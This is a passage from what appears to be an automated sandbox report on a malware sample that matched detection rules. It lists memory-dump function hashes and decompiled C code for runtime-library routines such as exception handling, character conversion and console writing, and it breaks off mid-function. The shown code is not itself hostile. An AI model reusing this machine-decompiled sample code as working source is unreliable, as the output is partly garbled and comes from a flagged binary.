                • Source File: 0000000B.00000002.306571716.00000000026E0000.00000040.00000040.sdmp, Offset: 026E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1cbe8203b03ede1860d0d178a5e76ee36cc41833d6b7b72a3687562569151fd0
                • Instruction ID: 6bf484f24204f107a0cb8007f2c302ba7276bd32dddeaf5df37a10de686ceb1e
                • Opcode Fuzzy Hash: 1cbe8203b03ede1860d0d178a5e76ee36cc41833d6b7b72a3687562569151fd0
                • Instruction Fuzzy Hash: 06110A30205740DFDB15CB54D980B25BB95EF84718F24C99DE84A1B753C77BD803CA91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026611DF, Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 696bc5a1e18e41c08f8c15bbcf08de259e66037252694838a8485596ab066631
                • Instruction ID: 640346adb30e53393d89c2b74c6f20fee298256269036850a42c3ea7f6b5cf89
                • Opcode Fuzzy Hash: 696bc5a1e18e41c08f8c15bbcf08de259e66037252694838a8485596ab066631
                • Instruction Fuzzy Hash: 0A1165303182808FC709AB29D4AC8797FF9AF87701B1581EBE44ACB376CB655C4ACB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0266238F, Relevance: .1, Instructions: 52COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7b9df29c92886b4d0113ba4de4069f77b747ea446f8be202882bc15f96423e0b
                • Instruction ID: 2325cf4fcf67dc483fd33628255d2327430c7f9f70d06083fe260269aaf5eb86
                • Opcode Fuzzy Hash: 7b9df29c92886b4d0113ba4de4069f77b747ea446f8be202882bc15f96423e0b
                • Instruction Fuzzy Hash: FB115A70908289CFDB289F64D968AFEBFB1EB44304F14046ED942A7785DB710987CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026605C8, Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6c142e92eeba489bd567dc2df6bc1b04f2d39dae96b2323a3d1ba436d4bbe25b
                • Instruction ID: 63b91e12bdc99a53e6636bfaf54a34640cade3378558416a3481758d25a8a4d6
                • Opcode Fuzzy Hash: 6c142e92eeba489bd567dc2df6bc1b04f2d39dae96b2323a3d1ba436d4bbe25b
                • Instruction Fuzzy Hash: 94F090317102204FCA8C327E54266BF2ACBBBC5A50B64402EF10AD73D5CD70AC0363EA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026E05D4, Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306571716.00000000026E0000.00000040.00000040.sdmp, Offset: 026E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 012d7337a89e4661610377783fd3683c6e874e3fb62abdf9afc76d4d380eace1
                • Instruction ID: e4dcf6f469aca03e97e85e9fe18c412d17a74f752918f2fa90445e63ea2b889a
                • Opcode Fuzzy Hash: 012d7337a89e4661610377783fd3683c6e874e3fb62abdf9afc76d4d380eace1
                • Instruction Fuzzy Hash: 46F0A9B650D7806FD7528F06AC41862FFB8EF86630709C4DFEC498B612D129A909CB72
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02661218, Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 385e2fe8d4246f088049becff0e42c32f7931a0e0604e60366ab65938af33863
                • Instruction ID: 4bb3d282963fcf552f8cccfa74bf44b82b4975532f627ad2bc091b1ee1ae11f1
                • Opcode Fuzzy Hash: 385e2fe8d4246f088049becff0e42c32f7931a0e0604e60366ab65938af33863
                • Instruction Fuzzy Hash: 94011D30314114CBC608AB29D49C9797BEABFC6700B2540EAE40ACB775CF729C4A8B86
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02660918, Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7b3edf6738fc7fb5e04350f9c856efee0ed38916d6e5c5a47ddd7a512bc8317d
                • Instruction ID: 59b2805a018ee6f26c52857a5e96c71c20636fedfa399c5f40b7d71abab23ac0
                • Opcode Fuzzy Hash: 7b3edf6738fc7fb5e04350f9c856efee0ed38916d6e5c5a47ddd7a512bc8317d
                • Instruction Fuzzy Hash: 56E0E532B252189ADB1856F599082BFBBAAB795290F004637991B93300DA70490682D1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02663BC4, Relevance: .0, Instructions: 32COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eebb166e30d37082eef9733bcde81b749746e9edbd80c0a9d468648ee3466005
                • Instruction ID: 7cbb7e67411b9cbc983cf2afce54d4120f2b6d08dcee426065ff0f80b41cc345
                • Opcode Fuzzy Hash: eebb166e30d37082eef9733bcde81b749746e9edbd80c0a9d468648ee3466005
                • Instruction Fuzzy Hash: E9F05E31B04609CBCB04FB99E8865ACBB72FB90710F244196E4059B299DF30A953C782
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026E8300, Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306571716.00000000026E0000.00000040.00000040.sdmp, Offset: 026E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3f6f7c96804cda76668e35a3bbcf86681c06fe62140db942cdcb6afdd34f29c
                • Instruction ID: 0e7a2eb3d0cafd1717f1704fba5ebcdc74bf34f804c67756dd3b287d96e5649e
                • Opcode Fuzzy Hash: c3f6f7c96804cda76668e35a3bbcf86681c06fe62140db942cdcb6afdd34f29c
                • Instruction Fuzzy Hash: 58F01D35144644DFC706CF44D580B15FBA2FB89718F24C6ADE9491BB62C737D813DA81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026E05F6, Relevance: .0, Instructions: 27COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306571716.00000000026E0000.00000040.00000040.sdmp, Offset: 026E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c79567a490f8c234402cd71b9f569840c2a5b0d1eaf013b7dfe63d95881bd813
                • Instruction ID: a348322421619d1b9be495b0af1271e6b29625088e2328a735d20a6fd88daf68
                • Opcode Fuzzy Hash: c79567a490f8c234402cd71b9f569840c2a5b0d1eaf013b7dfe63d95881bd813
                • Instruction Fuzzy Hash: F2E092766447005BD790CF0AEC41452F794EB84630B08C07FDC0D8B700E57AF508CEA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02662D20, Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 37c119ac6136bee0e96fd7a1de7cf434cf98689cff4921f10473a436a47b985a
                • Instruction ID: 0a09f49c29c85bf912f129ba3c9a8056201db36b68e80f6b3228454ea32f856b
                • Opcode Fuzzy Hash: 37c119ac6136bee0e96fd7a1de7cf434cf98689cff4921f10473a436a47b985a
                • Instruction Fuzzy Hash: EAD0173408D2C8AED75A03A82C39BF43F20DB2B201F1807DBD88A4A0E68041160BDA02
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0266064F, Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f57d87e26625dca441f5ad44e99681535b269024a0962e72c856daf9d267f158
                • Instruction ID: 5bd148af4a9e0329e481a35e3ed0d0060d3bfb5da56a14db75e0d3b3508df838
                • Opcode Fuzzy Hash: f57d87e26625dca441f5ad44e99681535b269024a0962e72c856daf9d267f158
                • Instruction Fuzzy Hash: BBD05B7258D1D48FC74A0770182E4F43F50DE63250B2444EBC44146462C4662557D602
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026602A1, Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9bc2ed6fda66a5001128450b54661e047136057ff0d9f680bfcde11611e26840
                • Instruction ID: 9512c69eaa1d90e6b02306104b36a3731fc94e38ce1b401a8b7e36930da58628
                • Opcode Fuzzy Hash: 9bc2ed6fda66a5001128450b54661e047136057ff0d9f680bfcde11611e26840
                • Instruction Fuzzy Hash: B1E0123414DB88CFC3969764A9A48F57FF0FF462003094A9ED4D647595C624B90ED701
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0266016F, Relevance: .0, Instructions: 18COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9d0ecee4a008bdaa4e77f26b0bfe5c21a1b8395ac5492ec986a959a62cd963b0
                • Instruction ID: 6f9ea00a546a7cf6c9dfa1c81c478ce4ca0fc0610d9e4185d3a7eef738d7e64e
                • Opcode Fuzzy Hash: 9d0ecee4a008bdaa4e77f26b0bfe5c21a1b8395ac5492ec986a959a62cd963b0
                • Instruction Fuzzy Hash: 0AE01236645340CFCB056770A85D46C3B71DF6626631506BFD426C7AE1E97E844ADA00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02662CF0, Relevance: .0, Instructions: 13COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 87bdc88f686140a9912c77920e05dccb99669dbd9b6cc2cd572baf71be6c93f1
                • Instruction ID: 8b1a20f3f1a76012049ced63973a02466464a5db846502498465f36effd488d7
                • Opcode Fuzzy Hash: 87bdc88f686140a9912c77920e05dccb99669dbd9b6cc2cd572baf71be6c93f1
                • Instruction Fuzzy Hash: 0DD0C974104205CBCF08FB78A49C92C7BE1BB84300B11441EE546C7298DB3148019743
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02660180, Relevance: .0, Instructions: 12COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f9d67f30dbf2fc70dacb374bb6596c74285635fe0817b8773d84abeced557c89
                • Instruction ID: e2c7f0c492f2bd8502ba3dc57bb403c74331cf7ccb3b174abce92b89bbf5363c
                • Opcode Fuzzy Hash: f9d67f30dbf2fc70dacb374bb6596c74285635fe0817b8773d84abeced557c89
                • Instruction Fuzzy Hash: 9BD01234201304CFCB083B70E41D42C37A5EB58246352087EE80687750EE3BE855DA40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02662D30, Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: df448df93f8d750b1d733d87169d2f2b77f38a0cac69359a83d47083664147b0
                • Instruction ID: 870902a1e52972540a2ad765f9c0fdd9af16a6c56e906291557ce4ba31b11059
                • Opcode Fuzzy Hash: df448df93f8d750b1d733d87169d2f2b77f38a0cac69359a83d47083664147b0
                • Instruction Fuzzy Hash: 54C0923818C608F6EB9C1388AC3EFB87218A71DB02E100803EE0F1C0E81581A912C056
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02660660, Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f08d8f52b9fe57e56f8430dcb0e5b6e2ea30e07d7d42d11f1c3fec11893126de
                • Instruction ID: 33e1a4da51fd671124cff50f7a55c71814ebd2f62f0b5645b4fcb5046d6be4f7
                • Opcode Fuzzy Hash: f08d8f52b9fe57e56f8430dcb0e5b6e2ea30e07d7d42d11f1c3fec11893126de
                • Instruction Fuzzy Hash: DAC09B7105966CCFC65C57716C0D439721977D5315F60C437950140131C9727563E956
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02662EC0, Relevance: .0, Instructions: 8COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d513961e309f589937271fee7b979964cad699fadf183b254d67e8f48dff38b4
                • Instruction ID: fdef6fee4a61939adfba8cbe6a85e0ecb971eaa0d0094714e0be14f2d18486b5
                • Opcode Fuzzy Hash: d513961e309f589937271fee7b979964cad699fadf183b254d67e8f48dff38b4
                • Instruction Fuzzy Hash: EBB012302042090B274057F62C0CB62338C568040574004769C0CC0100F604D0907180
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 0040446F, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0x8da58853
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}






































                0x0040446f
                0x0040446f
                0x0040446f
                0x0040447a
                0x0040447f
                0x00404481
                0x00404488
                0x00404489
                0x0040448b
                0x0040448e
                0x00404493
                0x00404493
                0x0040449f
                0x004044b2
                0x004044c0
                0x004044c6
                0x004044cc
                0x004044d2
                0x004044d8
                0x004044de
                0x004044e4
                0x004044ea
                0x004044f0
                0x004044f6
                0x004044fd
                0x00404504
                0x0040450b
                0x00404512
                0x00404519
                0x00404520
                0x00404521
                0x0040452a
                0x00404530
                0x00404533
                0x00404539
                0x00404546
                0x0040454f
                0x00404558
                0x00404561
                0x0040456f
                0x00404571
                0x0040457e
                0x00404586
                0x00404592
                0x00404595
                0x0040459a
                0x004045a1
                0x004045a9

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00404567
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
                • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
                Memory Dump Source
                • Source File: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
                • Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x8da58853
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                0x004078d4
                0x004078d5
                0x004078d6
                0x004078dd
                0x004078e2
                0x004078e8
                0x004078ee
                0x004078f4
                0x004078f7
                0x004078f7
                0x004078fa
                0x004078fc
                0x004078fc
                0x004078fa
                0x004078fe
                0x00407903
                0x0040790a
                0x0040790d
                0x0040790d
                0x00407929
                0x0040792f
                0x00407934
                0x00407ac7
                0x00407ad2
                0x00407ada
                0x0040793a
                0x0040793a
                0x0040793d
                0x00407942
                0x00407946
                0x0040799a
                0x0040799a
                0x0040799c
                0x0040799e
                0x00407abc
                0x00407abc
                0x00407abe
                0x00407abf
                0x00407ac5
                0x00000000
                0x00407ac5
                0x004079af
                0x004079b5
                0x004079b7
                0x00000000
                0x00000000
                0x004079bd
                0x004079cf
                0x004079d4
                0x004079d8
                0x00000000
                0x00000000
                0x004079e5
                0x00407a1f
                0x00407a22
                0x00407a25
                0x00407a27
                0x00407a29
                0x00407a2b
                0x00407a77
                0x00407a77
                0x00407a79
                0x00407a79
                0x00407a7b
                0x00407ab5
                0x00407ab6
                0x00000000
                0x00407abb
                0x00407a8f
                0x00407a94
                0x00407a96
                0x00000000
                0x00000000
                0x00407a9a
                0x00407a9b
                0x00407a9c
                0x00407a9f
                0x00407adb
                0x00407ade
                0x00407aa1
                0x00407aa1
                0x00407aa2
                0x00407aa2
                0x00407aaf
                0x00407ab1
                0x00407ab3
                0x00407ae4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407ab3
                0x00407a2d
                0x00407a30
                0x00407a32
                0x00407a34
                0x00407a36
                0x00407a39
                0x00407a3e
                0x00407a59
                0x00407a5b
                0x00407a65
                0x00407a67
                0x00407a68
                0x00407a6a
                0x00000000
                0x00000000
                0x00407a6c
                0x00407a72
                0x00407a72
                0x00000000
                0x00407a72
                0x00407a40
                0x00407a42
                0x00407a46
                0x00407a4b
                0x00407a4d
                0x00407a4f
                0x00000000
                0x00000000
                0x00407a51
                0x00000000
                0x00407a51
                0x004079e7
                0x004079ec
                0x00000000
                0x00000000
                0x004079f2
                0x004079f4
                0x00000000
                0x00000000
                0x00407a10
                0x00407a14
                0x00000000
                0x00000000
                0x00000000
                0x00407a1a
                0x0040794d
                0x0040794f
                0x00407951
                0x00407959
                0x00407978
                0x0040797a
                0x00407984
                0x00407986
                0x00407987
                0x00407989
                0x00000000
                0x00000000
                0x0040798f
                0x00407995
                0x00407995
                0x00000000
                0x00407995
                0x0040795d
                0x00407961
                0x00407966
                0x0040796a
                0x00000000
                0x00000000
                0x00407970
                0x00000000
                0x00407970

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                • __alloca_probe_16.LIBCMT ref: 00407961
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 0000000B.00000001.289566409.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 3864826663-0
                • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x8da58853
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
